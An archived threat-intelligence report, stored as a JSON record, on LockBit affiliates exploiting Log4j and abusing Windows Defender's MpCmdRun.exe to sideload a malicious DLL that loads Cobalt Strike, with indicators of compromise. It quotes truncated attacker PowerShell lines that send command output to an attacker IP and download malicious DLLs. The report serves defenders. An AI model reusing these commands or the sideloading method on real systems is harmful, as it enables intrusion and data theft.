{
	"id": "d14f0cb9-1ebe-450c-bd6a-73534fdd63c4",
	"created_at": "2026-04-06T00:07:03.761649Z",
	"updated_at": "2026-04-10T03:24:23.903622Z",
	"deleted_at": null,
	"sha1_hash": "f27328c6b8b1e2c8c83bc8a330c2b583439d845e",
	"title": "Living Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1485385,
	"plain_text": "Living Off Windows Defender | LockBit Ransomware Sideloads\r\nCobalt Strike Through Microsoft Security Tool\r\nBy Julio Dantas, James Haughom \u0026 Julien Reisdorffer\r\nPublished: 2022-07-28 · Archived: 2026-04-05 16:00:53 UTC\r\nLockBit has been receiving a fair share of attention recently. Last week, SentinelLabs reported on LockBit 3.0\r\n(aka LockBit Black), describing how the latest iteration of this increasingly prevalent RaaS implemented a series\r\nof anti-analysis and anti-debugging routines. Our research was quickly followed up by others reporting similar\r\nfindings. Meanwhile, back in April, SentinelLabs reported on how a LockBit affiliate was leveraging the\r\nlegitimate VMware command line utility, VMwareXferlogs.exe , in a live engagement to side load Cobalt Strike.\r\nIn this post, we follow up on that incident by describing the use of another legitimate tool used to similar effect by\r\na LockBit operator or affiliate, only this time the tool in question turns out to belong to a security tool: Windows\r\nDefender. During a recent investigation, we found that threat actors were abusing the Windows Defender\r\ncommand line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.\r\nOverview\r\nThe initial target compromise happened via the Log4j vulnerability against an unpatched VMWare Horizon\r\nServer. 
The attackers modified the Blast Secure Gateway component of the application installing a web shell using\r\nPowerShell code found documented here.\r\nOnce initial access had been achieved, the threat actors performed a series of enumeration commands and\r\nattempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire and a new way to\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 1 of 5\n\nside-load Cobalt Strike.\r\nIn particular, when attempting to execute Cobalt Strike we observed a new legitimate tool used for side-loading a\r\nmalicious DLL, that decrypts the payload.\r\nPreviously observed techniques to evade defenses by removing EDR/EPP’s userland hooks, Event Tracing for\r\nWindows and Antimalware Scan Interface were also observed.\r\nAttack Chain\r\nOnce the attackers gained initial access via the Log4j vulnerability, reconnaissance began using PowerShell to\r\nexecute commands and exfiltrate the command output via a POST base64 encoded request to an IP. 
Examples of\r\nthe reconnaissance activity can be seen below:\r\npowershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String\r\nOnce the threat actor acquired sufficient privileges, they attempted to download and execute multiple post-exploitation payloads.\r\nThe threat actor downloads a malicious DLL, the encrypted payload and the legitimate tool from their controlled\r\nC2:\r\npowershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll -OutFile c:\\windows\\help\\\r\nNotably, the threat actor leverages the legitimate Windows Defender command line tool MpCmdRun.exe to decrypt\r\nand load Cobalt Strike payloads.\r\nWe also note the correlation between the IP address used to download the Cobalt Strike payload and the IP address\r\nused to perform reconnaissance: shortly after downloading Cobalt Strike the threat actor tried to execute and send\r\nthe output to the IP starting with 139, as can be seen in both snippets below.\r\npowershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\\users\\public\\\r\npowershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String\r\nFollowing the same flow as the sideloading of the VMwareXferlogs.exe utility reported on previously,\r\nMpCmdRun.exe is abused to side-load a weaponized mpclient.dll, which loads and decrypts Cobalt Strike Beacon\r\nfrom the c0000015.log file.\r\nAs such, the components used in the attack specifically related to the use of the Windows Defender command line\r\ntool are:\r\nFilename Description\r\nmpclient.dll Weaponized DLL loaded by MpCmdRun.exe\r\nMpCmdRun.exe 
Legitimate/signed Microsoft Defender utility\r\nC0000015.log Encrypted Cobalt Strike payload\r\nConclusion\r\nDefenders need to be alert to the fact that LockBit ransomware operators and affiliates are exploring and\r\nexploiting novel “living off the land” tools to aid them in loading Cobalt Strike beacons and evading some\r\ncommon EDR and traditional AV detection tools.\r\nImportantly, tools that should receive careful scrutiny are any that either the organization or the organization’s\r\nsecurity software have made exceptions for. Products like VMware and Windows Defender have a high\r\nprevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed\r\nsecurity controls.\r\nIndicators of Compromise\r\nIoC Description\r\na512215a000d1b21f92dbef5d8d57a420197d262 Malicious glib-2.0.dll\r\n729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll\r\n10039d5e5ee5710a067c58e76cd8200451e54b55 Malicious glib-2.0.dll\r\nff01473073c5460d1e544f5b17cd25dadf9da513 Malicious glib-2.0.dll\r\ne35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log\r\n82bd4273fa76f20d51ca514e1070a3369a89313b Encrypted Cobalt Strike payload – c0000015.log\r\n091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload – c0000015.log\r\n0815277e12d206c5bbb18fd1ade99bf225ede5db Encrypted Cobalt Strike payload – c0000013.log\r\need31d16d3673199b34b48fb74278df8ec15ae33 Malicious mpclient.dll\r\n149.28.137[.]7 Cobalt Strike C2\r\n45.32.108[.]54 IP where the attacker staged the malicious payloads to be downloaded\r\n139.180.184[.]147 Attacker C2 used to receive data from executed commands\r\ninfo.openjdklab[.]xyz Domain used by the mpclient.dll\r\nSource: 
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/"
	],
	"report_names": [
		"living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434023,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.pdf",
		"text": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.txt",
		"img": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.jpg"
	}
}